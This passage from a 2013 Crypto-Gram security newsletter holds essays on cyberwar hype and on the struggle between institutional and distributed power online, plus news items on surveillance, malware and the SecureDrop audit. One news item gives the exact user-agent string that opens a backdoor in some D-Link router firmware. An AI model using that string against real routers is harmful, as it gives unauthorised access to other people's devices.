A lot of the problem here is of definition. There isn’t broad agreement as to what constitutes cyber war, and this confusion plays into the hands of those hyping its threat. If everything from Chinese espionage to Russian criminal extortion to activist disruption falls under the cyber war umbrella, then it only makes sense to put more of the Internet under government—and thus military—control. Rid’s book is a compelling counter-argument to this approach.

Rid’s final chapter is an essay unto itself, and lays out his vision as to how we should deal with threats in cyberspace. For policymakers who won’t sit through an entire book, this is the chapter I would urge them to read. Arms races are dangerous and destabilizing, and we’re in the early years of a cyberwar arms race that’s being fueled by fear and ignorance. This book is a cogent counterpoint to the doomsayers and the profiteers, and should be required reading for anyone concerned about security in cyberspace.

This book review previously appeared in Europe’s World.
http://europesworld.org/2013/10/01/…

Thomas Rid, “Cyber War Will Not Take Place,” Oxford University Press, 2013.


Understanding the Threats in Cyberspace

The primary difficulty of cyber security isn’t technology—it’s policy. The Internet mirrors real-world society, which makes security policy online as complicated as it is in the real world. Protecting critical infrastructure against cyber-attack is just one of cyberspace’s many security challenges, so it’s important to understand them all before any one of them can be solved.

The list of bad actors in cyberspace is long, and spans a wide range of motives and capabilities. At the extreme end there’s cyberwar: destructive actions by governments during a war. When government policymakers like David Omand think of cyber-attacks, that’s what comes to mind. Cyberwar is conducted by capable and well-funded groups and involves military operations against both military and civilian targets. Along much the same lines are non-nation state actors who conduct terrorist operations. Although less capable and well-funded, they are often talked about in the same breath as true cyberwar.

Much more common are the domestic and international criminals who run the gamut from lone individuals to organized crime. They can be very capable and well-funded and will continue to inflict significant economic damage.

Threats from peacetime governments have been seen increasingly in the news. The US worries about Chinese espionage against Western targets, and we’re also seeing US surveillance of pretty much everyone in the world, including Americans inside the US. The National Security Agency (NSA) is probably the most capable and well-funded espionage organization in the world, and we’re still learning about the full extent of its sometimes illegal operations.

Hacktivists are a different threat. Their actions range from Internet-age acts of civil disobedience to the inflicting of actual damage. This is hard to generalize about because the individuals and groups in this category vary so much in skill, funding and motivation. Hackers falling under the “anonymous” aegis—it really isn’t correct to call them a group—come under this category, as does WikiLeaks. Most of these attackers are outside the organization, although whistleblowing—the civil disobedience of the information age—generally involves insiders like Edward Snowden.

This list of potential network attackers isn’t exhaustive. Depending on who you are and what your organization does, you might be also concerned with espionage cyber-attacks by the media, rival corporations or even the corporations we entrust with our data.

The issue here, and why it affects policy, is that protecting against these various threats can lead to contradictory requirements. In the US, the NSA’s post-9/11 mission to protect the country from terrorists has transformed it into a domestic surveillance organization. The NSA’s need to protect its own information systems from outside attack opened it up to attacks from within. Do the corporate security products we buy to protect ourselves against cybercrime contain backdoors that allow for government spying? European countries may condemn the US for spying on its own citizens, but do they do the same thing?

All these questions are especially difficult because military and security organizations along with corporations tend to hype particular threats. For example, cyberwar and cyberterrorism are greatly overblown as threats—because they result in massive government programs with huge budgets and power—while cybercrime is largely downplayed.

We need greater transparency, oversight and accountability on both the government and corporate sides before we can move forward. With the secrecy that surrounds cyber-attack and cyberdefense it’s hard to be optimistic.

This essay previously appeared in “Europe’s World.”
http://europesworld.org/commentaries/…


News

Ed Felten makes a strong argument that a court order is exactly the same thing as an insider attack:
https://freedom-to-tinker.com//felten/…
This is why designing Lavabit to be resistant to court order would have been the right thing to do, and why we should all demand systems that are designed in this way.
http://boingboing.net/2013/10/15/…

There seems to be a bunch of research into uniquely identifying cell phones through unique analog characteristics of the various embedded sensors. These sorts of things could replace cookies as surveillance tools.
http://www.hotmobile.org/2014/papers/posters/…
http://.sfgate.com/techchron/2013/10/10/…
http://yro.slashdot.org/story/13/10/11/1231240/…
http://www.metafilter.com/132752/…

Several versions of D-Link router firmware contain a backdoor. Just set the browser’s user agent string to “xmlset_roodkcableoj28840ybtide,” and you’re in. (Hint, remove the number and read it backwards.) It was probably put there for debugging purposes, but has all sorts of applications for surveillance.
http://www.devttys0.com/2013/10/…
http://www.infoworld.com/d/security/…
There are open-source programs available to replace the firmware:
http://www.infoworld.com/d/networking/…

The new iPhone has a motion sensor chip, and that opens up new opportunities for surveillance.
http://www.wired.com/opinion/2013/10/…

Slashdot asks whether I can be trusted:
http://ask.slashdot.org/story/13/10/22/1416201/…

DARPA is looking for a fully automated network defense system, and has a contest:
http://www.darpa.mil/NewsEvents/Releases/2013/10/…
http://www.forbes.com/sites/andygreenberg/2013/10/…
http://gizmodo.com/…
http://www.infosecurity-magazine.com/view/35211/…
http://news.slashdot.org/story/13/10/24/0242252/…
http://www.reddit.com/r/netsec/comments/1ozoiy/…

Cognitive biases about violence as a negotiating tactic: interesting paper.
http://www.academia.edu/4770419/…

This article talks about applications of close-in surveillance using your phone’s Wi-Fi in retail, but the possibilities are endless.
http://www.washingtonpost.com/s/the-switch/wp/…
Basically, the system is using the MAC address to identify individual devices. Another article on the system is here.
http://www.nytimes.com/2013/07/15/business/…

Good story of badBIOS, a really nasty piece of malware. The weirdest part is how it uses ultrasonic sound to jump air gaps.
http://arstechnica.com/security/2013/10/…
I’m not sure what to make of this. When I first read it, I thought it was a hoax. But enough others are taking it seriously that I think it’s a real story. I don’t know whether the facts are real, and I haven’t seen anything about what this malware actually does.
http://boingboing.net/2013/10/31/…
http://www.reddit.com/r/netsec/comments/1pm66y/…
https://news.ycombinator.com/item?id=6654663
http://.erratasec.com/2013/10/…
A debunking:
http://www.rootwyrm.com/2013/11/…

This story of the bomb squad at the Boston marathon interesting reading, but I’m left wanting more. What are the lessons here? How can we do this better next time? Clearly we won’t be able to anticipate bombings; even Israel can’t do that. We have to get better at responding.
http://www.wired.com/threatlevel/2013/10/…

Here’s a demonstration of the US government’s capabilities to monitor the public Internet. Former CIA and NSA Director Michael Hayden was on the Acela train between New York and Washington DC, taking press interviews on the phone. Someone nearby overheard the conversation, and started tweeting about it. Within 15 or so minutes, someone somewhere noticed the tweets, and informed someone who knew Hayden. That person called Hayden on his cell phone and, presumably, told him to shut up. Nothing covert here; the tweets were public.
http://www.theguardian.com/world/2013/oct/24/…
I don’t think this was a result of the NSA monitoring the Internet. I think this was some public relations office—probably the one that is helping General Alexander respond to all the Snowden stories—who is searching the public Twitter feed for, among other things, Hayden’s name. Even so: wow.

This elliptic-curve crypto primer is well-written and very good.
http://arstechnica.com/security/2013/10/…

The wings of the *Goniurellia tridens* fruit fly have images of an ant on them, to deceive predators: “When threatened, the fly flashes its wings to give the appearance of ants walking back and forth. The predator gets confused and the fly zips off.”
http://www.thenational.ae/news/uae-news/science/…

Interesting article on risk-based authentication. I like the idea of giving each individual login attempt a risk score, based on the characteristics of the attempt.
http://deloitte.wsj.com/cio/2013/10/30/…

This bizarre essay argues that online gambling is a strategic national threat because terrorists could use it to launder money.
http://www.tampabay.com/opinion/columns/…
I’m impressed with the massive fear resonating.

Adobe lost 150 million customer passwords. Even worse, it had a pretty dumb cryptographic hash system protecting those passwords.
http://www.theguardian.com/technology/2013/nov/07/…
http://nakedsecurity.sophos.com/2013/11/04/…
http://xkcd.com/1286/

Microsoft has announced plans to retire SHA-1 by 2016. I think this is a good move.
https://www.schneier.com/blog/archives/2013/11/…


SecureDrop

SecureDrop is an open-source whistleblower support system, originally written by Aaron Swartz and now run by the Freedom of the Press Foundation. The first instance of this system was named StrongBox and is being run by “The New Yorker.” To further add to the naming confusion, Aaron Swartz called the system DeadDrop when he wrote the code.

I participated in a detailed security audit of the StrongBox implementation, along with some great researchers from the University of Washington and Jake Applebaum. The problems we found were largely procedural, and things that the Freedom of the Press Foundation are working to fix.

Freedom of the Press Foundation is not running any instances of SecureDrop. It has about a half dozen major news organization lined up, and will be helping them install their own starting the first week of November. So hopefully any would-be whistleblowers will soon have their choice of news organizations to securely communicate with.

Strong technical whistleblower protection is essential, especially given President Obama’s war on whistleblowers. I hope this system is broadly implemented and extensively used.

SecureDrop:
https://pressfreedomfoundation.org/securedrop
https://pressfreedomfoundation.org//2013/10/…

StrongBox:
http://www.newyorker.com/strongbox/

DeadDrop:
http://deaddrop.github.io/

Our security audit:
http://homes.cs.washington.edu/~aczeskis/research/…

Obama’s war on whistleblowers:
http://www.motherjones.com/politics/2012/06/…
http://www.techdirt.com/articles/20130722/…
https://www.cpj.org/reports/2013/10/…

The US government sets up secure indoor tents for the president and other officials to deal with classified material while traveling abroad.
http://www.theage.com.au/world/…


Dry Ice Bombs at LAX

The news story about the guy who left dry ice bombs in restricted areas of LAX is really weird.

I can’t get worked up over it, though. Dry ice bombs are a harmless prank. I set off a bunch of them when I was in college, although I used liquid nitrogen, because I was impatient—and they’re harmless. I know of someone who set a few off over the summer, just for fun. They do make a very satisfying boom.

Having them set off in a secure airport area doesn’t illustrate any new vulnerabilities. We already know that trusted people can subvert security systems. So what?

I’ve done a bunch of press interviews on this. One radio announcer really didn’t like my nonchalance. He really wanted me to complain about the lack of cameras at LAX, and was unhappy when I pointed out that we didn’t need cameras to catch this guy.

I like my kicker quote in this article:

Various people, including former Los Angeles Police Chief William Bratton, have called LAX the No. 1 terrorist target on the West Coast. But while an Algerian man discovered with a bomb at the Canadian border in 1999 was sentenced to 37 years in prison in connection with a plot to cause damage at LAX, Schneier said that assessment by Bratton is probably not true.

“Where can you possibly get that data?” he said. “I don’t think terrorists respond to opinion polls about how juicy targets are.”

http://www.latimes.com/local/lanow/…
http://www.latimes.com/local/lanow/…
http://www.latimes.com/local/…
http://www.dailynews.com/general-news/20131019/…


Schneier News

In Spring semester, I’m running a reading group—which seems to be a formal variant of a study group—at Harvard Law School on “Security, Power, and the Internet. I would like a good mix of people, so non law students and non Harvard students are both welcome to sign up.
http://www.law.harvard.edu/academics/curriculum/…

Various security articles about me (or with good quotes by me):
http://fedscoop.com/…
http://www.techdirt.com/articles/20131105/11325125139/
http://www.computerworld.com/s/article/9243865/…
http://www.economist.com/s/babbage/2013/11/…

My talk at the IETF Vancouver meeting on NSA and surveillance:
http://www.youtube.com/watch?v=oV71hhEpQ20

Press articles about me and the IEFT meeting:
http://www.darkreading.com/vulnerability/…
http://www.technologyreview.com/view/521306/…
http://www.ip-watch.org/2013/11/07/…
http://www.economist.com/news/…
http://www.net-security.org/secworld.php?id=15916

Other video interviews:
http://cis-india.org/internet-governance//…
http://connecttheworld.blogs.cnn.com/tag/…
http://www.youtube.com/watch?v=Ar67N94NYr0
http://www.youtube.com/watch?…
http://www.channel4.com/news/…


The Battle for Power on the Internet

We’re in the middle of an epic battle for power in cyberspace. On one side are the traditional, organized, institutional powers such as governments and large multinational corporations. On the other are the distributed and nimble: grassroots movements, dissident groups, hackers, and criminals. Initially, the Internet empowered the second side. It gave them a place to coordinate and communicate efficiently, and made them seem unbeatable. But now, the more traditional institutional powers are winning, and winning big. How these two sides fare in the long term, and the fate of the rest of us who don’t fall into either group, is an open question—and one vitally important to the future of the Internet.

In the Internet’s early days, there was a lot of talk about its “natural laws”—how it would upend traditional power blocks, empower the masses, and spread freedom throughout the world. The international nature of the Internet circumvented national laws. Anonymity was easy. Censorship was impossible. Police were clueless about cybercrime. And bigger changes seemed inevitable. Digital cash would undermine national sovereignty. Citizen journalism would topple traditional media, corporate PR, and political parties. Easy digital copying would destroy the traditional movie and music industries. Web marketing would allow even the smallest companies to compete against corporate giants. It really would be a new world order.

This was a utopian vision, but some of it did come to pass. Internet marketing has transformed commerce. The entertainment industries have been transformed by things like MySpace and YouTube, and are now more open to outsiders. Mass media has changed dramatically, and some of the most influential people in the media have come from the blogging world. There are new ways to organize politically and run elections. Crowdfunding has made tens of thousands of projects possible to finance, and crowdsourcing made more types of projects possible. Facebook and Twitter really did help topple governments.

But that is just one side of the Internet’s disruptive character. The Internet has emboldened traditional power as well.

On the corporate side, power is consolidating, a result of two current trends in computing. First, the rise of cloud computing means that we no longer have control of our data. Our e-mail, photos, calendars, address books, messages, and documents are on servers belonging to Google, Apple, Microsoft, Facebook, and so on. And second, we are increasingly accessing our data using devices that we have much less control over: iPhones, iPads, Android phones, Kindles, ChromeBooks, and so on. Unlike traditional operating systems, those devices are controlled much more tightly by the vendors, who limit what software can run, what they can do, how they’re updated, and so on. Even Windows 8 and Apple’s Mountain Lion operating system are heading in the direction of more vendor control.

I have previously characterized this model of computing as “feudal.” Users pledge their allegiance to more powerful companies who, in turn, promise to protect them from both sysadmin duties and security threats. It’s a metaphor that’s rich in history and in fiction, and a model that’s increasingly permeating computing today.

Medieval feudalism was a hierarchical political system, with obligations in both directions. Lords offered protection, and vassals offered service. The lord-peasant relationship was similar, with a much greater power differential. It was a response to a dangerous world.

Feudal security consolidates power in the hands of the few. Internet companies, like lords before them, act in their own self-interest. They use their relationship with us to increase their profits, sometimes at our expense. They act arbitrarily. They make mistakes. They’re deliberately—and incidentally—changing social norms. Medieval feudalism gave the lords vast powers over the landless peasants; we’re seeing the same thing on the Internet.

It’s not all bad, of course. We, especially those of us who are not technical, like the convenience, redundancy, portability, automation, and shareability of vendor-managed devices. We like cloud backup. We like automatic updates. We like not having to deal with security ourselves. We like that Facebook just works—from any device, anywhere.

Government power is also increasing on the Internet. There is more government surveillance than ever before. There is more government censorship than ever before. There is more government propaganda, and an increasing number of governments are controlling what their users can and cannot do on the Internet. Totalitarian governments are embracing a growing “cyber sovereignty” movement to further consolidate their power. And the cyberwar arms race is on, pumping an enormous amount of money into cyber-weapons and consolidated cyber-defenses, further increasing government power.

In many cases, the interests of corporate and government powers are aligning. Both corporations and governments benefit from ubiquitous surveillance, and the NSA is using Google, Facebook, Verizon, and others to get access to data it couldn’t otherwise. The entertainment industry is looking to governments to enforce its antiquated business models. Commercial security equipment from companies like BlueCoat and Sophos is being used by oppressive governments to surveil and censor their citizens. The same facial recognition technology that Disney uses in its theme parks can also identify protesters in China and Occupy Wall Street activists in New York. Think of it as a public/private surveillance partnership.

What happened? How, in those early Internet years, did we get the future so wrong?

The truth is that technology magnifies power in general, but rates of adoption are different. The unorganized, the distributed, the marginal, the dissidents, the powerless, the criminal: they can make use of new technologies very quickly. And when those groups discovered the Internet, suddenly they had power. But later, when the already-powerful big institutions finally figured out how to harness the Internet, they had more power to magnify. That’s the difference: the distributed were more nimble and were faster to make use of their new power, while the institutional were slower but were able to use their power more effectively.

So while the Syrian dissidents used Facebook to organize, the Syrian government used Facebook to identify dissidents to arrest.

All isn’t lost for distributed power, though. For institutional power, the Internet is a change in degree, but for distributed power, it’s a qualitative one. The Internet gives decentralized groups—for the first time—the ability to coordinate. This can have incredible ramifications, as we saw in the SOPA/PIPA debate, Gezi, Brazil, and the rising use of crowdfunding. It can invert power dynamics, even in the presence of surveillance, censorship, and use control. But aside from political coordination, the Internet allows for social coordination as well—to unite, for example, ethnic diasporas, gender minorities, sufferers of rare diseases, and people with obscure interests.

This isn’t static: Technological advances continue to provide advantage to the nimble. I discussed this trend in my book “Liars and Outliers.” If you think of security as an arms race between attackers and defenders, any technological advance gives one side or the other a temporary advantage. But most of the time, a new technology benefits the nimble first. They are not hindered by bureaucracy—and sometimes not by laws or ethics, either. They can evolve faster.

We saw it with the Internet. As soon as the Internet started being used for commerce, a new breed of cybercriminal emerged, immediately able to take advantage of the new technology. It took police a decade to catch up. And we saw it on social media, as political dissidents made use of its organizational powers before totalitarian regimes did.

This delay is what I call a “security gap.” It’s greater when there’s more technology, and in times of rapid technological change. Basically, if there are more innovations to exploit, there will be more damage resulting from society’s inability to keep up with exploiters of all of them. And since our world is one in which there’s more technology than ever before, and a faster rate of technological change than ever before, we should expect to see a greater security gap than ever before. In other words, there will be an increasing time period during which nimble distributed powers can make use of new technologies before slow institutional powers can make better use of those technologies.

This is the battle: quick vs. strong. To return to medieval metaphors, you can think of a nimble distributed power—whether marginal, dissident, or criminal—as Robin Hood; and ponderous institutional powers—both government and corporate—as the feudal lords.

So who wins? Which type of power dominates in the coming decades?

Right now, it looks like traditional power. Ubiquitous surveillance means that it’s easier for the government to identify dissidents than it is for the dissidents to remain anonymous. Data monitoring means easier for the Great Firewall of China to block data than it is for people to circumvent it. The way we all use the Internet makes it much easier for the NSA to spy on everyone than it is for anyone to maintain privacy. And even though it is easy to circumvent digital copy protection, most users still can’t do it.

The problem is that leveraging Internet power requires technical expertise. Those with sufficient ability will be able to stay ahead of institutional powers. Whether it’s setting up your own e-mail server, effectively using encryption and anonymity tools, or breaking copy protection, there will always be technologies that can evade institutional powers. This is why cybercrime is still pervasive, even as police savvy increases; why technically capable whistleblowers can do so much damage; and why organizations like Anonymous are still a viable social and political force. Assuming technology continues to advance—and there’s no reason to believe it won’t—there will always be a security gap in which technically advanced Robin Hoods can operate.

Most people, though, are stuck in the middle. These are people who don’t have the technical ability to evade large governments and corporations, avoid the criminal and hacker groups who prey on us, or join any resistance or dissident movements. These are the people who accept default configuration options, arbitrary terms of service, NSA-installed backdoors, and the occasional complete loss of their data. These are the people who get increasingly isolated as government and corporate power align. In the feudal world, these are the hapless peasants. And it’s even worse when the feudal lords—or any powers—fight each other. As anyone watching “Game of Thrones” knows, peasants get trampled when powers fight: when Facebook, Google, Apple, and Amazon fight it out in the market; when the US, EU, China, and Russia fight it out in geopolitics; or when it’s the US vs. “the terrorists” or China vs. its dissidents.

The abuse will only get worse as technology continues to advance. In the battle between institutional power and distributed power, more technology means more damage. We’ve already seen this: Cybercriminals can rob more people more quickly than criminals who have to physically visit everyone they rob. Digital pirates can make more copies of more things much more quickly than their analog forebears. And we’ll see it in the future: 3D printers mean that the computer restriction debate will soon involves guns, not movies. Big data will mean that more companies will be able to identify and track you more easily. It’s the same problem as the “weapons of mass destruction” fear: terrorists with nuclear or biological weapons can do a lot more damage than terrorists with conventional explosives. And by the same token, terrorists with large-scale cyberweapons can potentially do more damage than terrorists with those same bombs.

It’s a numbers game. Very broadly, because of the way humans behave as a species and as a society, every society is going to have a certain amount of crime. And there’s a particular crime rate society is willing to tolerate. With historically inefficient criminals, we were willing to live with some percentage of criminals in our society. As technology makes each individual criminal more powerful, the percentage we can tolerate decreases. Again, remember the “weapons of mass destruction” debate: As the amount of damage each individual terrorist can do increases, we need to do increasingly more to prevent even a single terrorist from succeeding.

The more destabilizing the technologies, the greater the rhetoric of fear, and the stronger institutional powers will get. This means increasingly repressive security measures, even if the security gap means that such measures become increasingly ineffective. And it will squeeze the peasants in the middle even more.

Without the protection of his own feudal lord, the peasant was subject to abuse both by criminals and other feudal lords. But both corporations and the government—and often the two in cahoots—are using their power to their own advantage, trampling on our rights in the process. And without the technical savvy to become Robin Hoods ourselves, we have no recourse but to submit to whatever the ruling institutional power wants.

So what happens as technology increases? Is a police state the only effective way to control distributed power and keep our society safe? Or do the fringe elements inevitably destroy society as technology increases their power? Probably neither doomsday scenario will come to pass, but figuring out a stable middle ground is hard. These questions are complicated, and dependent on future technological advances that we cannot predict. But they are primarily political questions, and any solutions will be political.

In the short term, we need more transparency and oversight. The more we know of what institutional powers are doing, the more we can trust that they are not abusing their authority. We have long known this to be true in government, but we have increasingly ignored it in our fear of terrorism and other modern threats. This is also true for corporate power. Unfortunately, market dynamics will not necessarily force corporations to be transparent; we need laws to do that. The same is true for decentralized power; transparency is how we’ll differentiate political dissidents from criminal organizations.

Oversight is also critically important, and is another long-understood mechanism for checking power. This can be a combination of things: courts that act as third-party advocates for the rule of law rather than rubber-stamp organizations, legislatures that understand the technologies and how they affect power balances, and vibrant public-sector press and watchdog groups that analyze and debate the actions of those wielding power.

Transparency and oversight give us the confidence to trust institutional powers to fight the bad side of distributed power, while still allowing the good side to flourish. For if we’re going to entrust our security to institutional powers, we need to know they will act in our interests and not abuse that power. Otherwise, democracy fails.

In the longer term, we need to work to reduce power differences. The key to all of this is access to data. On the Internet, data is power. To the extent the powerless have access to it, they gain in power. To the extent that the already powerful have access to it, they further consolidate their power. As we look to reducing power imbalances, we have to look at data: data privacy for individuals, mandatory disclosure laws for corporations, and open government laws.

Medieval feudalism evolved into a more balanced relationship in which lords had responsibilities as well as rights. Today’s Internet feudalism is both ad-hoc and one-sided. Those in power have a lot of rights, but increasingly few responsibilities or limits. We need to rebalance this relationship. In medieval Europe, the rise of the centralized state and the rule of law provided the stability that feudalism lacked. The Magna Carta first forced responsibilities on governments and put humans on the long road toward government by the people and for the people. In addition to re-reigning in government power, we need similar restrictions on corporate power: a new Magna Carta focused on the institutions that abuse power in the 21st century.

Today’s Internet is a fortuitous accident: a combination of an initial lack of commercial interests, government benign neglect, military requirements for survivability and resilience, and computer engineers building open systems that worked simply and easily.

We’re at the beginning of some critical debates about the future of the Internet: the proper role of law enforcement, the character of ubiquitous surveillance, the collection and retention of our entire life’s history, how automatic algorithms should judge us, government control over the Internet, cyberwar rules of engagement, national sovereignty on the Internet, limitations on the power of corporations over our data, the ramifications of information consumerism, and so on.

Data is the pollution problem of the information age. All computer processes produce it. It stays around. How we deal with it—how we reuse and recycle it, who has access to it, how we dispose of it, and what laws regulate it—is central to how the information age functions. And I believe that just as we look back at the early decades of the industrial age and wonder how society could ignore pollution in their rush to build an industrial world, our grandchildren will look back at us during these early decades of the information age and judge us on how we dealt with the rebalancing of power resulting from all this new data.

This won’t be an easy period for us as we try to work these issues out. Historically, no shift in power has ever been easy. Corporations have turned our personal data into an enormous revenue generator, and they’re not going to back down. Neither will governments, who have harnessed that same data for their own purposes. But we have a duty to tackle this problem.

I can’t tell you what the result will be. These are all complicated issues, and require meaningful debate, international cooperation, and innovative solutions. We need to decide on the proper balance between institutional and decentralized power, and how to build tools that amplify what is good in each while suppressing the bad.

This essay previously appeared in the Atlantic.
http://www.theatlantic.com/technology/archive/2013/…

Feudal security:
https://www.schneier.com/essay-406.html

Increasing government power:
https://www.schneier.com/essay-420.html

Cyberwar arms race:
https://www.schneier.com/essay-421.html

Public/private surveillance partnership:
https://www.schneier.com/essay-436.html

Ubiquitous surveillance:
https://www.schneier.com/essay-460.html

How technological advances make this worse:
https://www.schneier.com/essay-460.html

Transparency and oversight:
https://www.schneier.com/essay-425.html

This essay has been translated into Danish.
http://www.dseneste.dk/index.php/politik/…


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise. You can subscribe, unsubscribe, or change your address on the Web at <http://www.schneier.com/crypto-gram.html>. Back issues are also available at that URL.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Bruce Schneier is an internationally renowned security technologist, called a “security guru” by The Economist. He is the author of 12 books—including “Liars and Outliers: Enabling the Trust Society Needs to Survive”—as well as hundreds of articles, essays, and academic papers. His influential newsletter “Crypto-Gram” and his blog “Schneier on Security” are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation’s Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and the Security Futurologist for BT—formerly British Telecom. See <http://www.schneier.com>.

Crypto-Gram is a personal newsletter. Opinions expressed are not necessarily those of BT.

Copyright (c) 2013 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.